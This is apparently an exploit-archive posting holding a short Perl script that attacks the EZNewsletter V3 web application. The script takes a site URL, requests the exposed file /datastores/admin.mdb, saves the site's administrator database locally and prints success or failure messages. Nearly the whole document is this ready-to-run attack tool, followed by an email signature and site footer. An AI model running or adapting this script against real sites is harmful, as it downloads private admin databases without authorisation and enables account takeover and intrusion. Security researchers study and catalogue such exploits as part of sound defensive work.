EZNewsletter version 3 database disclosure exploit. This leverages a vulnerability first discovered in December of 2008.
973c23fc722f7dd33ba3f7509282242f2c2499055f2f841bbb9c047cf2ba3b31
#!/usr/bin/perl
#############################################################
# Application Name : EZNewsletter V3
# Vulnerable Type : Arbitrary Database Disclosure Vulnerability
# Infection : Admins Database Download
# Script Downlaod : http://www.htmljunction.com/eznewsletterv3.zip
# author : Septemb0x
#############################################################
# Greetz BHDR, BARCOD3
use lwp::UserAgent;
system('cls');
system('title EZNewsletter V3 Remote Database Disclosure Exploit');
system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : \n perl exploit.pl http://sitename/path ";exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "\n\n[-] EZNewsletter V3 Remote Database Disclosure Exploit\n";
print "[+] Author : Septemb0x \n\n\n";
print "[!] Exploiting $site ....\n";
my $site = $ARGV[0] ;
my $target = $site."/datastores/admin.mdb" ;
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb | Cyber-Warrior Bug Researcher Group | Septemb0x...";exit();}
else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();}
_________________________________________________________________
Sadece e-posta iletilerinden daha fazlasý: Diðer Windows Live™ özelliklerine göz atýn.
http://www.microsoft.com/turkiye/windows/windowslive/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed